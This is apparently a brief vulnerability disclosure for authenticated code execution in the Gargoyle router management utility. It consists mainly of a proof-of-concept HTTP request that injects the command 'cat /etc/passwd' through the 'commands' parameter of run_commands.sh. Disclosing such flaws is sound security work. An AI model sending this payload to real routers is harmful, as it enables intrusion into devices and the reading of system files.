# Affected software: Gargoyle router management utility
# Type of vulnerability:code execution
# URL:http://www.gargoyle-router.com/
# Discovered by: provensec
# Website: provensec.com

#version:1.5.X (Built 20140215-1506 git@505e8dc)
# Proof of concept


vulnerable paramter= "commands"'

POST /utility/run_commands.sh HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/time.sh
Cookie: browser_time=1433405406;
hash=090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64;
exp=1433406276
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=--------108192589
Content-Length: 418

----------108192589
Content-Disposition: form-data; name="commands"


*cat/etc/passwd*
----------108192589
Content-Disposition: form-data; name="hash"

090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64
----------108192589--

##screenshot for output: http://prntscr.com/7ckcqd


and yes it requires authentiction